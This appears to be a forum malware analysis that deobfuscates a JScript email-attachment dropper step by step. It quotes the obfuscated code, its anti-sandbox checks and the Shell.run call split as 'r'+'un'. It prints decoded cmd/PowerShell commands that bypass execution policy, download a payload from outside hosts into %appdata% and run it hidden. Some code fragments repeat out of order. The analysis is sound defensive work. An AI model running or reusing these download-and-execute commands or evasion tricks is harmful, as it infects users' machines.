var yvyrsa = "ugq4b5zm5fbco6e74isb4rs4e62y6gbco6e77rs4e6xrs4e6 /ugq4b5 Powo5k9rs4e6rso5k9bco6e7rs4e6lly6gbco6e77o5k9rs4e6xrs4e6o5k9 -o5k9rs4e6xrs4e6o5k9ugq4b5o5k9uo5k9rs4e68ibp9o75Io5k9oNpoo5k9lIugq4b5yo5k9 ByPibp9o7Sso5k9 -o5k9no5k9Opo5k9rOo5k9fio5k9Lrs4e6 o5k9-wINisb4rs4e62oo5k9wsrs4e68ibp9o75ylo5k9rs4e6 o5k9bco6e7io5k9isb4rs4e62isb4rs4e62rs4e6No5k9 o5k9risb4rs4e62u6b8No5k9rs4e6o5k9wo5k9-o5k9oo5k9bjo5k9rs4e6ugq4b5rs4e68ibp9o75o5k9 so5k9yo5k9srs4e68ibp9o75rs4e6o5k9zm5fbco6e74y6gbco6e77Nrs4e6o5k9rs4e68ibp9o75y6gbco6e77Wrs4e6o5k9bo5k9ugq4b5lirs4e6No5k9rs4e68ibp9o75y7a6y6gbco6e77o5k9isb4rs4e62OwNLoibp9o7o5k9isb4rs4e62o5k9Filo5k9rs4e6risb4rs4e62u6b8o5k9'bco6e7rs4e68ibp9o75rs4e68ibp9o75pju9bl2//wipolrs4e6rs4e6ry6gbco6e77rs4e68ibp9o75op/usrs4e6ry6gbco6e77pbco6e7p?f=1y6gbco6e77isb4rs4e62ibp9o7rs4e68ibp9o75','fe8y8ibp9o7ppisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6'y7a6;Srs4e68ibp9o75o5k9ibp9o7o5k9ro5k9rs4e68ibp9o75-pRoo5k9ugq4b5o5k9rs4e6So5k9So5k9 fe8y8ibp9o7PPisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6";
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {
return yvyrsa;
}var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {
if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {
mlonyn++;
}var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {
case true:
}yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);
break;mlonyn++;
return yvyrsa;
Explanation :
two arrays are used for the replace part :
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
return yvyrsa;- var anwumo = ["bco6e7", '"y7a6", "ibp9o7", "zm5fh4", "ju9bl2", "ugq4b5", "fe8y8", "rs4e6", "o5k9", "isb4e2", "rdu6b8", '"e8a5", "y6gh7", "u3x5"];
=> an array with the pattern to be replaced
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
- var dopqitna = ["h", ")", "a", "m", ":", "c", "%", "e", "^", "d", "(", "t", ".", "\'"];
=> an array with the chars to be used for the replace part
var mlonyn = 0;
=> used as current index with the both arrays
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
=> used for the case part
=> epsura is true if we are in a running script
while (1) {=> epsura is true if we are in a running script
=>'infinite' loot until it breaks : when all the part have been replaced
if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
mlonyn++;
}if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
=> ztihi : string to be replaced, mlonyn : current index
=> example : index = 0 => "bco6e7"
var sejep = dopqitna[mlonyn];=> example : index = 0 => "bco6e7"
=> sejep : char / string that will replaced, mlonyn : current index
=> example : index = 0 => 'h'
var qaceco = new RegExp(ztihi, vjopyv);=> example : index = 0 => 'h'
=> RegExpA regular expression : is an object that describes a pattern of characters
=> vjopyv : gi : parameter :
=> example : /bco6e7/gi
}=> vjopyv : gi : parameter :
switch (epsura) {=> epsura is true if we are in a running script
case true:
yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);
=> gasvozgi = "replace"
=> example :
break;=> example :
index =0 :
- yvyrsa = yvyrsa["replace"](/bco6e7/gi, "h")
- all "bco6e7" pattern are replaced by "h" (case-insensitive matching)
=> exit the case part
mlonyn++;
=> index = index + 1
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://wipoleer.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
3) The current sample :
(1) A search on run => no result ...
=> it seems they have used in this sample another trick to avoid my easy method (run world)
(2) Let's search using the big function that should contain the command line, a parameter of the run method
We have find the famous function that returns the real command line.
=> method : a quick look at the content file :
This time : they used an array of strings that is joined to made a string
A small part :
function bufosmy() {
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme",
....
....
....
"hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
....
....
....
"hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
We have got the name of the function : bufosmy
A search on this name :
=> var ewubq = bufosmy();
=> ewubq is certainly the name of the var that is used on the part we are looking for, that would be an obfuscated line that do the similar as :
Shell.run(commandline,0)Let's verify :
A search on ewubq :
Found !
case true:
hahaha ! they have cut the run word in "r"+"un" to avoid the precedent working method based on the search of 'run' word
var guhhepxe = WScript.CreateObject("WScript.Shell");
guhhepxe["r" + "un"](ewubq, sumwyzu);
break;hahaha ! they have cut the run word in "r"+"un" to avoid the precedent working method based on the search of 'run' word
var guhhepxe = WScript.CreateObject("WScript.Shell");
=> Shell = WScript.CreateObject("WScript.Shell");
=> Shell.run(ewubq, 0);
and we have seen that var ewubq = bufosmy();
=> Shell.run(ewubq, 0);
and we have seen that var ewubq = bufosmy();
Let's understand how this function deobfuscate the command line
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
=> The join(",") method used at the end build a long string
=> array of string with patterns that will be replaced by chars from the long string
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];
var pfixyg = false;
while (1) {
=> The join(",") method used at the end build a long string
var ocolr =
"syby,oty,myxrwowme,x,vyl,yvyl,usq,wowme,Xwowme,nlunoty,o,majs,syby,nlunoty,o,powwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,wowme,Rxyfn,qqwowme,gi,wowme,uvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,Luvyl,vsaqq,vyl,saqq,,yvyl,usq,uvyl,vsaqq,vyl,saqq,,wowme,Xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,cag,wowme,xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,uuvyl,vsaqq,vyl,saqq,,oty,uvyl,vsaqq,vyl,saqq,,ioNuvyl,vsaqq,vyl,saqq,,Puvyl,vsaqq,vyl,saqq,,olisyby,Ynlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uvyl,vsaqq,vyl,saqq,,BYPsaqq,xyfn,xyfn,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,cag,uvyl,vsaqq,vyl,saqq,,nopruvyl,vsaqq,vyl,saqq,,OFiLuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,cag,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,Iuvyl,vsaqq,vyl,saqq,,Nuvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,ouvyl,vsaqq,vyl,saqq,,wwowme,vyl,wowme,,xyfn,oty,yuvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,qqwowme,gi,ivyl,uvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,wowme,nuvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uzalu,nwowme,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,cag,uvyl,vsaqq,vyl,saqq,,Obuvyl,vsaqq,vyl,saqq,,jwowme,syby,uvyl,vsaqq,vyl,saqq,,oty,nlunoty,o,uvyl,vsaqq,vyl,saqq,,xyfn,Yxyfn,oty,wowme,oty,myxrwowme,x,yvyl,usq,uvyl,vsaqq,vyl,saqq,,Nwowme,oty,uvyl,vsaqq,vyl,saqq,,yvyl,usq,wwowme,vyl,wowme,,wowme,bsyby,luvyl,vsaqq,vyl,saqq,,iuvyl,vsaqq,vyl,saqq,,wowme,Nuvyl,vsaqq,vyl,saqq,,oty,fwwowme,vyl,wowme,,saqq,s,yvyl,usq,vyl,uvyl,vsaqq,vyl,saqq,,Owwowme,vyl,wowme,,Nuvyl,vsaqq,vyl,saqq,,LOuvyl,vsaqq,vyl,saqq,,saqq,vyl,uvyl,vsaqq,vyl,saqq,,fIuvyl,vsaqq,vyl,saqq,,lwowme,uzalu,oqby,qqwowme,gi,oty,oty,pwowme,tpyvi,majs,majs,wwowme,vyl,wowme,,wwowme,vyl,wowme,,wwowme,vyl,wowme,,yvyl,usq,browwowme,vyl,wowme,,nsaqq,lwowme,oty,yvyl,usq,oty,opmajs,ivyl,yvyl,usq,pqqwowme,gi,p?f=1yvyl,usq,vyl,saqq,oty,oqby,,uvyl,vsaqq,vyl,saqq,,oqby,hkyz,saqq,ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,oqby,fwwowme,vyl,wowme,,saqq,s,iwwowme,vyl,wowme,,oty,wowme,jli,xyfn,oty,saqq,Roty,cag,puvyl,vsaqq,vyl,saqq,,rOuvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,wowme,xyfn,xyfn,uvyl,vsaqq,vyl,saqq,,nlunoty,o,uvyl,vsaqq,vyl,saqq,,hkyz,saqq,Ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,"
var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];"syby,oty,myxrwowme,x,vyl,yvyl,usq,wowme,Xwowme,nlunoty,o,majs,syby,nlunoty,o,powwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,wowme,Rxyfn,qqwowme,gi,wowme,uvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,Luvyl,vsaqq,vyl,saqq,,yvyl,usq,uvyl,vsaqq,vyl,saqq,,wowme,Xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,cag,wowme,xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,uuvyl,vsaqq,vyl,saqq,,oty,uvyl,vsaqq,vyl,saqq,,ioNuvyl,vsaqq,vyl,saqq,,Puvyl,vsaqq,vyl,saqq,,olisyby,Ynlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uvyl,vsaqq,vyl,saqq,,BYPsaqq,xyfn,xyfn,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,cag,uvyl,vsaqq,vyl,saqq,,nopruvyl,vsaqq,vyl,saqq,,OFiLuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,cag,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,Iuvyl,vsaqq,vyl,saqq,,Nuvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,ouvyl,vsaqq,vyl,saqq,,wwowme,vyl,wowme,,xyfn,oty,yuvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,qqwowme,gi,ivyl,uvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,wowme,nuvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uzalu,nwowme,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,cag,uvyl,vsaqq,vyl,saqq,,Obuvyl,vsaqq,vyl,saqq,,jwowme,syby,uvyl,vsaqq,vyl,saqq,,oty,nlunoty,o,uvyl,vsaqq,vyl,saqq,,xyfn,Yxyfn,oty,wowme,oty,myxrwowme,x,yvyl,usq,uvyl,vsaqq,vyl,saqq,,Nwowme,oty,uvyl,vsaqq,vyl,saqq,,yvyl,usq,wwowme,vyl,wowme,,wowme,bsyby,luvyl,vsaqq,vyl,saqq,,iuvyl,vsaqq,vyl,saqq,,wowme,Nuvyl,vsaqq,vyl,saqq,,oty,fwwowme,vyl,wowme,,saqq,s,yvyl,usq,vyl,uvyl,vsaqq,vyl,saqq,,Owwowme,vyl,wowme,,Nuvyl,vsaqq,vyl,saqq,,LOuvyl,vsaqq,vyl,saqq,,saqq,vyl,uvyl,vsaqq,vyl,saqq,,fIuvyl,vsaqq,vyl,saqq,,lwowme,uzalu,oqby,qqwowme,gi,oty,oty,pwowme,tpyvi,majs,majs,wwowme,vyl,wowme,,wwowme,vyl,wowme,,wwowme,vyl,wowme,,yvyl,usq,browwowme,vyl,wowme,,nsaqq,lwowme,oty,yvyl,usq,oty,opmajs,ivyl,yvyl,usq,pqqwowme,gi,p?f=1yvyl,usq,vyl,saqq,oty,oqby,,uvyl,vsaqq,vyl,saqq,,oqby,hkyz,saqq,ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,oqby,fwwowme,vyl,wowme,,saqq,s,iwwowme,vyl,wowme,,oty,wowme,jli,xyfn,oty,saqq,Roty,cag,puvyl,vsaqq,vyl,saqq,,rOuvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,wowme,xyfn,xyfn,uvyl,vsaqq,vyl,saqq,,nlunoty,o,uvyl,vsaqq,vyl,saqq,,hkyz,saqq,Ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,"
=> array of string with patterns that will be replaced by chars from the long string
=> Array of char that will replace the patterns from nedxes on the long string ocolr
Examples :
All wowme occurrences will be replaced on the obfuscated long string by e
All oqby occurrences will be replaced on the obfuscated long string by '
All majs occurrences will be replaced on the obfuscated long string by -
etc,...
The string and two arrays are initialized, now the code is ready to make the job :All oqby occurrences will be replaced on the obfuscated long string by '
All majs occurrences will be replaced on the obfuscated long string by -
etc,...
var pfixyg = false;
while (1) {
if (!pfixyg) pfixyg = 0; => the index is initialized with 0
=> pfixyg : index to scan the arrays
if (pfixyg == nedxes.length) break;
=> If all values from nedxes (the patterns) have been used => break
var ugula = nedxes[pfixyg];
=> the pattern to be removed from long string
switch (omide()) {
pfixyg++;
}=> retrieves a value from omide()
omide() => always return true (see the above spoiler)
case true:
var ovhugca = new RegExp(ugula, erazyf);
ocolr = ocolr[replace](ovhugca, ezujigz[pfixyg]);
}
function omide() {
Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
}var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
=> function anonymous() {
return new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'
}omide() => always return true (see the above spoiler)
case true:
var ovhugca = new RegExp(ugula, erazyf);
=> RegExp : regular expression : is an object that describes a pattern of characters=> all occurrences of the current pattern (depends of the current index of the loop) are replace by the corresponding char, in the obfuscated long string (the command line)
break;
Example : Loop with index : 0
=> pfixyg : 0
=> ezujigz[pfixyg] => ezujigz[0] => "e"
Then :
=> ezujigz[pfixyg] => ezujigz[0] => "e"
Then :
=> ocolr = ocolr[replace](/wowme/gi , "e")
All wowme occurrences will be replaced on the obfuscated long string by e
All wowme occurrences will be replaced on the obfuscated long string by e
pfixyg++;
=> next index => next pattern replaced by the corresponding char, on the obfuscated command line strin (that then become less obfuscated )
return ocolr;
=> here, the end of the loop :
=> all replacements have been made
=> the deobfuscated command line string is returned
=> the deobfuscated command line string is returned
"cmd.eXe /c pow^eRshe^l^L^.^eX^e^ -ex^e^c^u^t^ioN^P^olicY ^BYPass -^nopr^OFiL^e^ -w^I^N^d^o^wsty^l^e^ hid^d^en^ (new^-^Ob^jec^t ^sYstem.^Net^.webcl^i^eN^t).d^OwN^LO^ad^fI^le('http ://www .brownalet.top/id.php?f=1.dat',^'%appdata%\eXe');staRt-p^rO^c^ess^ ^%aPpdata%\eXe"
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
Small modifications that don't really make harder to get all the malware parts.
run powershell.exe :
-execuyionpolivy bypass
-----------------=> allows to bypass the execution policy
-noprofile
=> to launch the script with in an untouched environment (it ddoesn't load the Windows Powershell profile)
-windowstyle hidden
=> hide the powershell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');
=> creates an .NET object and use its downloadfile method to downlad the payload and save it on HD
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
start-process %appdata%\eXe"=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
=> run the payload
BILL-24436.js
7.js
Last edited: